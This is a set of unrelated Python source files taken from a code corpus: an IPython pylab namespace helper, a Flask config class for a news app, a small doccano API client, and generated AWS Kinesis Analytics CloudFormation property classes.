    # Prevent pylab.show() from blocking waiting for a main loop.
    pylab.show._needmain = False
    # We need to detect at runtime whether show() is called by the user.
    # For this, we wrap it into a decorator which adds a 'called' flag.
    pylab.draw_if_interactive = flag_calls(pylab.draw_if_interactive)
def import_pylab(user_ns, import_all=True):
    """Populate the namespace with pylab-related values.

    Imports matplotlib, pylab, numpy, and everything from pylab and numpy.
    Also installs the conventional short aliases ``np`` and ``plt`` and a
    few IPython names (figsize, display, getfigs).

    Parameters
    ----------
    user_ns : dict
        The namespace (e.g. the shell's user namespace) to populate.
    import_all : bool
        When True, additionally star-import matplotlib.pylab and numpy.
    """
    # Import numpy as np/pyplot as plt are conventions we're trying to
    # somewhat standardize on. Making them available to users by default
    # will greatly help this.
    s = ("import numpy\n"
          "import matplotlib\n"
          "from matplotlib import pylab, mlab, pyplot\n"
          "np = numpy\n"
          "plt = pyplot\n"
          )
    # Parenthesized exec form works in both Python 2 (exec statement with
    # a 2-tuple) and Python 3 (exec function), unlike ``exec s in ns``.
    exec(s, user_ns)

    if import_all:
        s = ("from matplotlib.pylab import *\n"
             "from numpy import *\n")
        exec(s, user_ns)

    # IPython symbols to add
    user_ns['figsize'] = figsize
    from IPython.core.display import display
    # Add display and getfigs to the user's namespace
    user_ns['display'] = display
    user_ns['getfigs'] = getfigs
def configure_inline_support(shell, backend):
    """Configure an IPython shell object for matplotlib use.

    Parameters
    ----------
    shell : InteractiveShell instance
    backend : matplotlib backend
        When this is the inline backend, the figure-flushing post-execute
        hook is registered and the inline rcParams are loaded (after saving
        the current values); otherwise the hook is removed and any saved
        rcParams are restored.
    """
    # If using our svg payload backend, register the post-execution
    # function that will pick up the results for display.  This can only be
    # done with access to the real shell object.

    # Note: if we can't load the inline backend, then there's no point
    # continuing (such as in terminal-only shells in environments without
    # zeromq available).
    try:
        from IPython.kernel.zmq.pylab.backend_inline import InlineBackend
    except ImportError:
        return
    from matplotlib import pyplot

    cfg = InlineBackend.instance(parent=shell)
    cfg.shell = shell
    if cfg not in shell.configurables:
        shell.configurables.append(cfg)

    if backend == backends['inline']:
        from IPython.kernel.zmq.pylab.backend_inline import flush_figures
        shell.register_post_execute(flush_figures)

        # Save rcParams that will be overwritten, so they can be restored
        # if the user later switches away from the inline backend.
        shell._saved_rcParams = dict()
        for k in cfg.rc:
            shell._saved_rcParams[k] = pyplot.rcParams[k]
        # load inline_rc
        pyplot.rcParams.update(cfg.rc)
    else:
        from IPython.kernel.zmq.pylab.backend_inline import flush_figures
        # Switching away from inline: drop the flush hook and restore the
        # rcParams the inline backend had overridden.
        if flush_figures in shell._post_execute:
            shell._post_execute.pop(flush_figures)
        if hasattr(shell, '_saved_rcParams'):
            pyplot.rcParams.update(shell._saved_rcParams)
            del shell._saved_rcParams
    # Setup the default figure format
    select_figure_format(shell, cfg.figure_format)
| 34.414706 | 87 | 0.627724 |
0c4f9df7b10e49a9781d16ebba44dffa8e5e8c88 | 699 | py | Python | config.py | njiiri12/News-Highlights | ff9e2170c2b8f7f54534a4b9de38a55a111b0ad8 | [
"MIT"
] | null | null | null | config.py | njiiri12/News-Highlights | ff9e2170c2b8f7f54534a4b9de38a55a111b0ad8 | [
"MIT"
] | null | null | null | config.py | njiiri12/News-Highlights | ff9e2170c2b8f7f54534a4b9de38a55a111b0ad8 | [
"MIT"
] | null | null | null | import os
class Config:
    """General configuration parent class.

    Holds settings shared by every environment: the News API base URL and
    credentials read from the process environment.
    """
    # Base endpoint for listing news sources; caller formats in the API key.
    NEWS_API_BASE_URL = 'https://newsapi.org/v2/sources?apiKey={}'
    NEWS_API_KEY = os.environ.get('NEWS_API_KEY')
    SECRET_KEY = os.environ.get('SECRET_KEY')
class ProdConfig(Config):
    """Production configuration child class.

    Args:
        Config: The parent configuration class with general configuration
            settings.
    """
    pass
class DevConfig(Config):
    """Development configuration child class.

    Args:
        Config: The parent configuration class with general configuration
            settings.
    """
    # Enable Flask debug mode during development.
    DEBUG = True
# Map environment names to their configuration classes.
config_options = {
    'development': DevConfig,
    'production': ProdConfig,
}
bc5e03b2e0f3899b490b55bc52487166fc9e49c1 | 385 | py | Python | pydoccano/features.py | evstratbg/pydoccano | ce14307cae53f785f714656981b5b9a463758ef3 | [
"MIT"
] | 2 | 2020-04-11T14:48:28.000Z | 2020-09-24T12:38:30.000Z | pydoccano/features.py | evstratbg/pydoccano | ce14307cae53f785f714656981b5b9a463758ef3 | [
"MIT"
] | null | null | null | pydoccano/features.py | evstratbg/pydoccano | ce14307cae53f785f714656981b5b9a463758ef3 | [
"MIT"
] | 2 | 2020-04-06T11:46:45.000Z | 2020-04-27T03:18:46.000Z | from requests import Session
from .base_api import BaseApi
class Features(BaseApi):
    """API client for the doccano ``features`` endpoint."""

    def __init__(self, base_url: str, session: Session, version='v1'):
        # Parent class handles the base URL; keep the session and API
        # version here to build the endpoint path.
        super().__init__(base_url)
        self.session = session
        self.version = version
        self.base_endpoint = f"{self.version}/features"

    def get(self):
        """Issue a GET request against the features endpoint."""
        return self._get(endpoint=self.base_endpoint)
94f31e77d2a4496e05d3edc5301d8705bf4f2c2f | 108,821 | py | Python | cottonformation/res/kinesisanalyticsv2.py | MacHu-GWU/cottonformation-project | 23e28c08cfb5a7cc0db6dbfdb1d7e1585c773f3b | [
"BSD-2-Clause"
] | 5 | 2021-07-22T03:45:59.000Z | 2021-12-17T21:07:14.000Z | cottonformation/res/kinesisanalyticsv2.py | MacHu-GWU/cottonformation-project | 23e28c08cfb5a7cc0db6dbfdb1d7e1585c773f3b | [
"BSD-2-Clause"
] | 1 | 2021-06-25T18:01:31.000Z | 2021-06-25T18:01:31.000Z | cottonformation/res/kinesisanalyticsv2.py | MacHu-GWU/cottonformation-project | 23e28c08cfb5a7cc0db6dbfdb1d7e1585c773f3b | [
"BSD-2-Clause"
] | 2 | 2021-06-27T03:08:21.000Z | 2021-06-28T22:15:51.000Z | # -*- coding: utf-8 -*-
"""
This module
"""
import attr
import typing
from ..core.model import (
Property, Resource, Tag, GetAtt, TypeHint, TypeCheck,
)
from ..core.constant import AttrMeta
#--- Property declaration ---
@attr.s
class PropApplicationReferenceDataSourceRecordColumn(Property):
    """
    AWS Object Type = "AWS::KinesisAnalyticsV2::ApplicationReferenceDataSource.RecordColumn"

    Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-recordcolumn.html

    ``rp_``-prefixed fields are required, ``p_``-prefixed fields are
    optional; each field's CloudFormation doc link follows its definition.
    """
    AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::ApplicationReferenceDataSource.RecordColumn"

    rp_Name: TypeHint.intrinsic_str = attr.attrib(
        metadata={AttrMeta.PROPERTY_NAME: "Name"},
        default=None,
        validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-recordcolumn.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-recordcolumn-name"""

    rp_SqlType: TypeHint.intrinsic_str = attr.attrib(
        metadata={AttrMeta.PROPERTY_NAME: "SqlType"},
        default=None,
        validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-recordcolumn.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-recordcolumn-sqltype"""

    p_Mapping: TypeHint.intrinsic_str = attr.attrib(
        metadata={AttrMeta.PROPERTY_NAME: "Mapping"},
        default=None,
        validator=attr.validators.optional(
            attr.validators.instance_of(TypeCheck.intrinsic_str_type)
        ),
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-recordcolumn.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-recordcolumn-mapping"""
@attr.s
class PropApplicationS3ContentLocation(Property):
    """
    AWS Object Type = "AWS::KinesisAnalyticsV2::Application.S3ContentLocation"

    Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-s3contentlocation.html

    All fields are optional (``p_`` prefix); per-field CloudFormation doc
    links follow each definition.
    """
    AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.S3ContentLocation"

    p_BucketARN: TypeHint.intrinsic_str = attr.attrib(
        metadata={AttrMeta.PROPERTY_NAME: "BucketARN"},
        default=None,
        validator=attr.validators.optional(
            attr.validators.instance_of(TypeCheck.intrinsic_str_type)
        ),
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-s3contentlocation.html#cfn-kinesisanalyticsv2-application-s3contentlocation-bucketarn"""

    p_FileKey: TypeHint.intrinsic_str = attr.attrib(
        metadata={AttrMeta.PROPERTY_NAME: "FileKey"},
        default=None,
        validator=attr.validators.optional(
            attr.validators.instance_of(TypeCheck.intrinsic_str_type)
        ),
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-s3contentlocation.html#cfn-kinesisanalyticsv2-application-s3contentlocation-filekey"""

    p_ObjectVersion: TypeHint.intrinsic_str = attr.attrib(
        metadata={AttrMeta.PROPERTY_NAME: "ObjectVersion"},
        default=None,
        validator=attr.validators.optional(
            attr.validators.instance_of(TypeCheck.intrinsic_str_type)
        ),
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-s3contentlocation.html#cfn-kinesisanalyticsv2-application-s3contentlocation-objectversion"""
@attr.s
class PropApplicationPropertyGroup(Property):
    """
    AWS Object Type = "AWS::KinesisAnalyticsV2::Application.PropertyGroup"

    Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-propertygroup.html

    All fields are optional (``p_`` prefix); per-field CloudFormation doc
    links follow each definition.
    """
    AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.PropertyGroup"

    p_PropertyGroupId: TypeHint.intrinsic_str = attr.attrib(
        metadata={AttrMeta.PROPERTY_NAME: "PropertyGroupId"},
        default=None,
        validator=attr.validators.optional(
            attr.validators.instance_of(TypeCheck.intrinsic_str_type)
        ),
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-propertygroup.html#cfn-kinesisanalyticsv2-application-propertygroup-propertygroupid"""

    p_PropertyMap: dict = attr.attrib(
        metadata={AttrMeta.PROPERTY_NAME: "PropertyMap"},
        default=None,
        validator=attr.validators.optional(
            attr.validators.instance_of(dict)
        ),
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-propertygroup.html#cfn-kinesisanalyticsv2-application-propertygroup-propertymap"""
@attr.s
class PropApplicationInputParallelism(Property):
    """
    AWS Object Type = "AWS::KinesisAnalyticsV2::Application.InputParallelism"

    Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-inputparallelism.html

    Single optional field ``p_Count``; its CloudFormation doc link follows
    the definition.
    """
    AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.InputParallelism"

    p_Count: int = attr.attrib(
        metadata={AttrMeta.PROPERTY_NAME: "Count"},
        default=None,
        validator=attr.validators.optional(
            attr.validators.instance_of(int)
        ),
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-inputparallelism.html#cfn-kinesisanalyticsv2-application-inputparallelism-count"""
@attr.s
class PropApplicationOutputKinesisFirehoseOutput(Property):
    """
    AWS Object Type = "AWS::KinesisAnalyticsV2::ApplicationOutput.KinesisFirehoseOutput"

    Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationoutput-kinesisfirehoseoutput.html

    Single required field ``rp_ResourceARN``; its CloudFormation doc link
    follows the definition.
    """
    AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::ApplicationOutput.KinesisFirehoseOutput"

    rp_ResourceARN: TypeHint.intrinsic_str = attr.attrib(
        metadata={AttrMeta.PROPERTY_NAME: "ResourceARN"},
        default=None,
        validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationoutput-kinesisfirehoseoutput.html#cfn-kinesisanalyticsv2-applicationoutput-kinesisfirehoseoutput-resourcearn"""
@attr.s
class PropApplicationOutputKinesisStreamsOutput(Property):
    """
    AWS Object Type = "AWS::KinesisAnalyticsV2::ApplicationOutput.KinesisStreamsOutput"

    Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationoutput-kinesisstreamsoutput.html

    Single required field ``rp_ResourceARN``; its CloudFormation doc link
    follows the definition.
    """
    AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::ApplicationOutput.KinesisStreamsOutput"

    rp_ResourceARN: TypeHint.intrinsic_str = attr.attrib(
        metadata={AttrMeta.PROPERTY_NAME: "ResourceARN"},
        default=None,
        validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationoutput-kinesisstreamsoutput.html#cfn-kinesisanalyticsv2-applicationoutput-kinesisstreamsoutput-resourcearn"""
@attr.s
class PropApplicationApplicationSnapshotConfiguration(Property):
    """
    AWS Object Type = "AWS::KinesisAnalyticsV2::Application.ApplicationSnapshotConfiguration"

    Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-applicationsnapshotconfiguration.html

    Single required field ``rp_SnapshotsEnabled``; its CloudFormation doc
    link follows the definition.
    """
    AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.ApplicationSnapshotConfiguration"

    rp_SnapshotsEnabled: bool = attr.attrib(
        metadata={AttrMeta.PROPERTY_NAME: "SnapshotsEnabled"},
        default=None,
        validator=attr.validators.instance_of(bool),
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-applicationsnapshotconfiguration.html#cfn-kinesisanalyticsv2-application-applicationsnapshotconfiguration-snapshotsenabled"""
@attr.s
class PropApplicationKinesisFirehoseInput(Property):
    """
    AWS Object Type = "AWS::KinesisAnalyticsV2::Application.KinesisFirehoseInput"

    Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-kinesisfirehoseinput.html

    Single required field ``rp_ResourceARN``; its CloudFormation doc link
    follows the definition.
    """
    AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.KinesisFirehoseInput"

    rp_ResourceARN: TypeHint.intrinsic_str = attr.attrib(
        metadata={AttrMeta.PROPERTY_NAME: "ResourceARN"},
        default=None,
        validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-kinesisfirehoseinput.html#cfn-kinesisanalyticsv2-application-kinesisfirehoseinput-resourcearn"""
@attr.s
class PropApplicationParallelismConfiguration(Property):
    """
    AWS Object Type = "AWS::KinesisAnalyticsV2::Application.ParallelismConfiguration"

    Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-parallelismconfiguration.html

    ``rp_``-prefixed fields are required, ``p_``-prefixed fields are
    optional; each field's CloudFormation doc link follows its definition.
    """
    AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.ParallelismConfiguration"

    rp_ConfigurationType: TypeHint.intrinsic_str = attr.attrib(
        metadata={AttrMeta.PROPERTY_NAME: "ConfigurationType"},
        default=None,
        validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-parallelismconfiguration.html#cfn-kinesisanalyticsv2-application-parallelismconfiguration-configurationtype"""

    p_AutoScalingEnabled: bool = attr.attrib(
        metadata={AttrMeta.PROPERTY_NAME: "AutoScalingEnabled"},
        default=None,
        validator=attr.validators.optional(
            attr.validators.instance_of(bool)
        ),
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-parallelismconfiguration.html#cfn-kinesisanalyticsv2-application-parallelismconfiguration-autoscalingenabled"""

    p_Parallelism: int = attr.attrib(
        metadata={AttrMeta.PROPERTY_NAME: "Parallelism"},
        default=None,
        validator=attr.validators.optional(
            attr.validators.instance_of(int)
        ),
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-parallelismconfiguration.html#cfn-kinesisanalyticsv2-application-parallelismconfiguration-parallelism"""

    p_ParallelismPerKPU: int = attr.attrib(
        metadata={AttrMeta.PROPERTY_NAME: "ParallelismPerKPU"},
        default=None,
        validator=attr.validators.optional(
            attr.validators.instance_of(int)
        ),
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-parallelismconfiguration.html#cfn-kinesisanalyticsv2-application-parallelismconfiguration-parallelismperkpu"""
@attr.s
class PropApplicationMonitoringConfiguration(Property):
    """
    AWS Object Type = "AWS::KinesisAnalyticsV2::Application.MonitoringConfiguration"

    Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-monitoringconfiguration.html

    ``rp_``-prefixed fields are required, ``p_``-prefixed fields are
    optional; each field's CloudFormation doc link follows its definition.
    """
    AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.MonitoringConfiguration"

    rp_ConfigurationType: TypeHint.intrinsic_str = attr.attrib(
        metadata={AttrMeta.PROPERTY_NAME: "ConfigurationType"},
        default=None,
        validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-monitoringconfiguration.html#cfn-kinesisanalyticsv2-application-monitoringconfiguration-configurationtype"""

    p_LogLevel: TypeHint.intrinsic_str = attr.attrib(
        metadata={AttrMeta.PROPERTY_NAME: "LogLevel"},
        default=None,
        validator=attr.validators.optional(
            attr.validators.instance_of(TypeCheck.intrinsic_str_type)
        ),
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-monitoringconfiguration.html#cfn-kinesisanalyticsv2-application-monitoringconfiguration-loglevel"""

    p_MetricsLevel: TypeHint.intrinsic_str = attr.attrib(
        metadata={AttrMeta.PROPERTY_NAME: "MetricsLevel"},
        default=None,
        validator=attr.validators.optional(
            attr.validators.instance_of(TypeCheck.intrinsic_str_type)
        ),
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-monitoringconfiguration.html#cfn-kinesisanalyticsv2-application-monitoringconfiguration-metricslevel"""
@attr.s
class PropApplicationOutputDestinationSchema(Property):
    """
    AWS Object Type = "AWS::KinesisAnalyticsV2::ApplicationOutput.DestinationSchema"

    Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationoutput-destinationschema.html

    Single optional field ``p_RecordFormatType``; its CloudFormation doc
    link follows the definition.
    """
    AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::ApplicationOutput.DestinationSchema"

    p_RecordFormatType: TypeHint.intrinsic_str = attr.attrib(
        metadata={AttrMeta.PROPERTY_NAME: "RecordFormatType"},
        default=None,
        validator=attr.validators.optional(
            attr.validators.instance_of(TypeCheck.intrinsic_str_type)
        ),
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationoutput-destinationschema.html#cfn-kinesisanalyticsv2-applicationoutput-destinationschema-recordformattype"""
@attr.s
class PropApplicationCustomArtifactsConfiguration(Property):
    """
    AWS Object Type = "AWS::KinesisAnalyticsV2::Application.CustomArtifactsConfiguration"

    Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-customartifactsconfiguration.html

    This property type declares no fields of its own.
    """
    AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.CustomArtifactsConfiguration"
@attr.s
class PropApplicationOutputLambdaOutput(Property):
    """
    AWS Object Type = "AWS::KinesisAnalyticsV2::ApplicationOutput.LambdaOutput"

    Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationoutput-lambdaoutput.html

    Single required field ``rp_ResourceARN``; its CloudFormation doc link
    follows the definition.
    """
    AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::ApplicationOutput.LambdaOutput"

    rp_ResourceARN: TypeHint.intrinsic_str = attr.attrib(
        metadata={AttrMeta.PROPERTY_NAME: "ResourceARN"},
        default=None,
        validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationoutput-lambdaoutput.html#cfn-kinesisanalyticsv2-applicationoutput-lambdaoutput-resourcearn"""
@attr.s
class PropApplicationReferenceDataSourceJSONMappingParameters(Property):
    """
    AWS Object Type = "AWS::KinesisAnalyticsV2::ApplicationReferenceDataSource.JSONMappingParameters"

    Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-jsonmappingparameters.html

    Single required field ``rp_RecordRowPath``; its CloudFormation doc link
    follows the definition.
    """
    AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::ApplicationReferenceDataSource.JSONMappingParameters"

    rp_RecordRowPath: TypeHint.intrinsic_str = attr.attrib(
        metadata={AttrMeta.PROPERTY_NAME: "RecordRowPath"},
        default=None,
        validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-jsonmappingparameters.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-jsonmappingparameters-recordrowpath"""
@attr.s
class PropApplicationCloudWatchLoggingOptionCloudWatchLoggingOption(Property):
    """
    AWS Object Type = "AWS::KinesisAnalyticsV2::ApplicationCloudWatchLoggingOption.CloudWatchLoggingOption"

    Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationcloudwatchloggingoption-cloudwatchloggingoption.html

    Single required field ``rp_LogStreamARN``; its CloudFormation doc link
    follows the definition.
    """
    AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::ApplicationCloudWatchLoggingOption.CloudWatchLoggingOption"

    rp_LogStreamARN: TypeHint.intrinsic_str = attr.attrib(
        metadata={AttrMeta.PROPERTY_NAME: "LogStreamARN"},
        default=None,
        validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationcloudwatchloggingoption-cloudwatchloggingoption.html#cfn-kinesisanalyticsv2-applicationcloudwatchloggingoption-cloudwatchloggingoption-logstreamarn"""
@attr.s
class PropApplicationMavenReference(Property):
    """
    Property container for the CloudFormation object named in ``AWS_OBJECT_TYPE``
    below. All three attributes are required (``rp_`` prefix; validators are not
    wrapped in ``optional``, so the ``None`` defaults are rejected at init time).

    AWS Object Type = "AWS::KinesisAnalyticsV2::Application.MavenReference"
    Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-mavenreference.html
    Property Document:
    - ``rp_ArtifactId``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-mavenreference.html#cfn-kinesisanalyticsv2-application-mavenreference-artifactid
    - ``rp_GroupId``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-mavenreference.html#cfn-kinesisanalyticsv2-application-mavenreference-groupid
    - ``rp_Version``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-mavenreference.html#cfn-kinesisanalyticsv2-application-mavenreference-version
    """
    AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.MavenReference"
    # Required string property; CloudFormation name "ArtifactId".
    rp_ArtifactId: TypeHint.intrinsic_str = attr.ib(
        default=None,
        validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
        metadata={AttrMeta.PROPERTY_NAME: "ArtifactId"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-mavenreference.html#cfn-kinesisanalyticsv2-application-mavenreference-artifactid"""
    # Required string property; CloudFormation name "GroupId".
    rp_GroupId: TypeHint.intrinsic_str = attr.ib(
        default=None,
        validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
        metadata={AttrMeta.PROPERTY_NAME: "GroupId"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-mavenreference.html#cfn-kinesisanalyticsv2-application-mavenreference-groupid"""
    # Required string property; CloudFormation name "Version".
    rp_Version: TypeHint.intrinsic_str = attr.ib(
        default=None,
        validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
        metadata={AttrMeta.PROPERTY_NAME: "Version"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-mavenreference.html#cfn-kinesisanalyticsv2-application-mavenreference-version"""
@attr.s
class PropApplicationKinesisStreamsInput(Property):
    """
    Property container for the CloudFormation object named in ``AWS_OBJECT_TYPE``
    below. ``rp_ResourceARN`` is required (validator is not wrapped in
    ``optional``, so the ``None`` default is rejected at init time).

    AWS Object Type = "AWS::KinesisAnalyticsV2::Application.KinesisStreamsInput"
    Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-kinesisstreamsinput.html
    Property Document:
    - ``rp_ResourceARN``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-kinesisstreamsinput.html#cfn-kinesisanalyticsv2-application-kinesisstreamsinput-resourcearn
    """
    AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.KinesisStreamsInput"
    # Required string property; CloudFormation name "ResourceARN".
    rp_ResourceARN: TypeHint.intrinsic_str = attr.ib(
        default=None,
        validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
        metadata={AttrMeta.PROPERTY_NAME: "ResourceARN"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-kinesisstreamsinput.html#cfn-kinesisanalyticsv2-application-kinesisstreamsinput-resourcearn"""
@attr.s
class PropApplicationCheckpointConfiguration(Property):
    """
    Property container for the CloudFormation object named in ``AWS_OBJECT_TYPE``
    below. ``rp_ConfigurationType`` is required; the ``p_``-prefixed attributes
    are optional (their validators are wrapped in ``optional`` and accept None).

    AWS Object Type = "AWS::KinesisAnalyticsV2::Application.CheckpointConfiguration"
    Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-checkpointconfiguration.html
    Property Document:
    - ``rp_ConfigurationType``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-checkpointconfiguration.html#cfn-kinesisanalyticsv2-application-checkpointconfiguration-configurationtype
    - ``p_CheckpointInterval``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-checkpointconfiguration.html#cfn-kinesisanalyticsv2-application-checkpointconfiguration-checkpointinterval
    - ``p_CheckpointingEnabled``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-checkpointconfiguration.html#cfn-kinesisanalyticsv2-application-checkpointconfiguration-checkpointingenabled
    - ``p_MinPauseBetweenCheckpoints``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-checkpointconfiguration.html#cfn-kinesisanalyticsv2-application-checkpointconfiguration-minpausebetweencheckpoints
    """
    AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.CheckpointConfiguration"
    # Required string property; CloudFormation name "ConfigurationType".
    rp_ConfigurationType: TypeHint.intrinsic_str = attr.ib(
        default=None,
        validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
        metadata={AttrMeta.PROPERTY_NAME: "ConfigurationType"},
    )
